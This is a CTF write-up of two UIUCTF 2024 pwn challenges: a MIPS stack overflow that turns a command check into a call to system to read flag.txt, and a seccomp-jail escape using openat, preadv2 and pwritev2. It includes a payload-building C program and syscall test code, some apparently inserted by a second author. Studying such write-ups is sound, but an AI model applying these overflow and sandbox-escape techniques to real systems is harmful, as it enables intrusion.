[PWN - Writeup] Syscalls and Backup Power from UIUCTF 2024

(In the name of Allah, the Most Gracious, the Most Merciful)
(If I have done well, it is from Allah; if I have erred, it is from myself and from Satan)



Let's solve Backup Power & Syscalls (pwn).



Backup Power (pwn - 454)

This was a MIPS challenge (I like MIPS). Let's start by reversing the binary.

First, the security mitigations enabled on the binary:



What the binary takes from us:


Now let's reverse the binary. There is a list of commands, but only the allowed ones [shutup, shutdown] can be run, and system is not in the allowed list.






If we use "devolper" as the username, we take a branch that calls the function "develper_power_managemnet_portal".


This function is vulnerable to a stack overflow: it reads input without validating the size. But we have to take care of the stack: we have to make "vars20" equal to "cfi" so that the canary check does not fail (I think).


There is a default command, "todo", that is compared against the commands.


After all of that I thought I had to add "system" to the allowed list and then use it, but for some reason it did not work for me (maybe I did something wrong), so I used another way.

I set a breakpoint on "strcmp".


Now we can see that "todo" is compared with every command in the binary.





So I tried to overflow the "todo" command at "0x40800430" so that it becomes "system". After that I found there was a call to system; our buffer starts at "0x40800308".

When I tried to fill the padding between my buffer and the address of the "todo" command, I hit a crash.


I had overwritten a value that is loaded into the "$gp" register. I set a breakpoint on that address, ran the program normally again, took the correct value from it, "0x004aa330", and just filled the padding with it.

Replacing "todo" with "system" makes the check look like this:



And we will see that:


These "A"s are our buffer, so we have to put a command there that reads the flag. I only have 8 bytes, split as "4" + "4", and we know the flag is called "flag.txt", so I used the following payload: "cat " and "fla*".
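To make the stack layout above concrete, here is an added example (my own code, not the author's solution script) that builds the overflow with the three addresses quoted in this write-up: the buffer at 0x40800308, the "todo" string at 0x40800430, and the saved $gp value 0x004aa330 used as filler. Two things are assumptions, not facts from the write-up: that the 8-byte command sits contiguously at the start of the buffer, and that the binary is big-endian MIPS (the byte order is a parameter so you can try both).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses quoted in the write-up, taken from gdb on the challenge binary. */
#define BUF_ADDR   0x40800308u  /* start of the overflowing buffer */
#define TODO_ADDR  0x40800430u  /* where the "todo" command string lives */
#define GP_WORD    0x004aa330u  /* saved value that is reloaded into $gp */

/* Store a 32-bit word. MIPS comes in both byte orders and the write-up does not
 * say which one the challenge used, so big-endian is an assumption here. */
static void put_u32(uint8_t *dst, uint32_t v, int big_endian) {
    for (int i = 0; i < 4; i++) {
        int shift = big_endian ? 8 * (3 - i) : 8 * i;
        dst[i] = (uint8_t)(v >> shift);
    }
}

/* Lay out the overflow: [cmd, 8 bytes][saved-$gp word repeated]["system\0"].
 * Returns the payload length, or 0 if the inputs do not fit. */
size_t build_payload(uint8_t *out, size_t cap, const char *cmd, int big_endian) {
    size_t todo_off = TODO_ADDR - BUF_ADDR;            /* 0x128 = 296 bytes */
    if (strlen(cmd) != 8 || todo_off % 4 != 0 || cap < todo_off + 7)
        return 0;
    memcpy(out, cmd, 8);                                /* what system() receives */
    for (size_t off = 8; off < todo_off; off += 4)      /* 72 filler words */
        put_u32(out + off, GP_WORD, big_endian);
    memcpy(out + todo_off, "system", 7);                /* NUL included so strcmp matches */
    return todo_off + 7;
}

/* Where system() would stop reading the command: the first NUL byte in the buffer. */
size_t command_length(const uint8_t *payload, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return i;
    return len;
}

int main(void) {
    uint8_t payload[512];
    size_t n = build_payload(payload, sizeof payload, "cat fla*", 1);
    printf("payload: %zu bytes, command seen by system(): %zu bytes, at +0x%zx: %s\n",
           n, command_length(payload, n), (size_t)(TODO_ADDR - BUF_ADDR),
           (const char *)payload + (TODO_ADDR - BUF_ADDR));
    return 0;
}
```

Under the big-endian assumption the first filler byte after the command is 0x00 (the high byte of 0x004aa330), which is exactly where system() stops reading the string; that would be consistent with the 8-byte limit mentioned above, whereas in little-endian order the command would run on into the filler bytes.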

These are my final stack values:


And we got the flag ;-).


The solution script is here.

Syscalls (pwn - 398)

Hint from the name: it's related to some syscall jail xD.

First, run "seccomp-tools" to find the forbidden syscalls.


Reversing the binary shows that it's simple: it just takes input from you and executes it, after making sure there are no forbidden syscalls in it.




After searching the syscall table I found some useful syscalls [openat, preadv2, pwritev2], and I tried them first in a simple C program:

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/uio.h>

int main() {
    const char *filename = "flag.txt";
    /* -100 is AT_FDCWD: resolve the path relative to the current directory */
    int fd = openat(-100, filename, 0);
    if (fd < 0) {
        perror("openat");
        return 1;
    }

    char buffer[4096];              /* a byte buffer, not an array of pointers */
    struct iovec iov[1];
    iov[0].iov_base = buffer;
    iov[0].iov_len = sizeof(buffer);

    /* read starting at file offset 1, as in the first attempt (offset 0 reads from the start) */
    ssize_t bytes_read = preadv2(fd, iov, 1, 1, 0);
    if (bytes_read < 0) {
        perror("preadv2");
        return 1;
    }
    iov[0].iov_len = (size_t)bytes_read;  /* write back only what was read */

    /* first attempt: offset 0 on stdout; this is what fails when stdout is not seekable */
    ssize_t bytes_written = pwritev2(1, iov, 1, 0, 0);
    if (bytes_written < 0)
        perror("pwritev2");

    return 0;
}

First I tried it, but no flag was printed in the local test. The issue was in "pwritev2": it said that the fd (stdout) is not seekable. A friend helped me with this one: after checking the man page there is a comment, "if the offset argument is -1, then the current file offset is used and updated". I don't know what the heck this means, but when I tried it the magic happened and the issue was fixed locally.
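The "not seekable" error above is ESPIPE, and the difference between offset 0 and offset -1 is easy to reproduce without the challenge binary. The following added example (my own code, not from the write-up) writes a constructed sample string into a pipe, which is not seekable just like a terminal or a socket on stdout: pwritev2 with offset 0 fails with ESPIPE, while offset -1 behaves like writev and succeeds. It also does the round trip on a regular temporary file, where explicit offsets work, reading back from offset 1 to show that the first byte is skipped, as in the C test above.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

/* Write len bytes with pwritev2 at the given offset.
 * Returns the byte count on success or -errno on failure. */
long pwritev2_at(int fd, const char *buf, size_t len, off_t offset) {
    struct iovec iov = { .iov_base = (void *)buf, .iov_len = len };
    ssize_t n = pwritev2(fd, &iov, 1, offset, 0);
    return n < 0 ? -errno : n;
}

/* Read up to cap bytes with preadv2 at the given offset into out.
 * Returns the byte count on success or -errno on failure. */
long preadv2_at(int fd, char *out, size_t cap, off_t offset) {
    struct iovec iov = { .iov_base = out, .iov_len = cap };
    ssize_t n = preadv2(fd, &iov, 1, offset, 0);
    return n < 0 ? -errno : n;
}

/* Constructed sample data; this is not the challenge flag. */
static const char SAMPLE[] = "uiuctf{constructed_sample_flag}";

/* Write SAMPLE into a pipe (not seekable) with pwritev2 at `offset`, then read it back.
 * Returns what pwritev2 returned: -ESPIPE for offset 0, the byte count for offset -1. */
long pipe_write_demo(off_t offset, char *out, size_t cap) {
    int fds[2];
    if (pipe(fds) < 0)
        return -errno;
    long rc = pwritev2_at(fds[1], SAMPLE, sizeof(SAMPLE) - 1, offset);
    close(fds[1]);
    out[0] = '\0';
    if (rc > 0) {
        ssize_t got = read(fds[0], out, cap - 1);
        out[got > 0 ? got : 0] = '\0';
    }
    close(fds[0]);
    return rc;
}

/* Write SAMPLE to a regular file at offset 0, then preadv2 it back from `offset`.
 * Regular files are seekable, so both explicit offsets work. Returns bytes read. */
long file_roundtrip_demo(off_t offset, char *out, size_t cap) {
    char path[] = "/tmp/syscalls_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -errno;
    long rc = pwritev2_at(fd, SAMPLE, sizeof(SAMPLE) - 1, 0);
    out[0] = '\0';
    if (rc > 0) {
        rc = preadv2_at(fd, out, cap - 1, offset);
        out[rc > 0 ? rc : 0] = '\0';
    }
    close(fd);
    unlink(path);
    return rc;
}

int main(void) {
    char buf[128];
    long rc = pipe_write_demo(0, buf, sizeof buf);
    printf("pipe, offset 0  -> %ld (%s)\n", rc, rc < 0 ? strerror((int)-rc) : buf);
    rc = pipe_write_demo(-1, buf, sizeof buf);
    printf("pipe, offset -1 -> %ld (%s)\n", rc, rc < 0 ? strerror((int)-rc) : buf);
    rc = file_roundtrip_demo(1, buf, sizeof buf);
    printf("file, preadv2 at offset 1 -> %ld (%s)\n", rc, buf);
    return 0;
}
```

The same distinction applies to the raw syscalls the jail lets through: the kernel only rejects a positive offset on a non-seekable descriptor, and -1 tells it to use and advance the current file position, which is why the exploit shellcode needs -1 in the offset register for pwritev2 on stdout.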


Now we have to send assembly that does the same:


The solution script is here.

Thanks for reading.
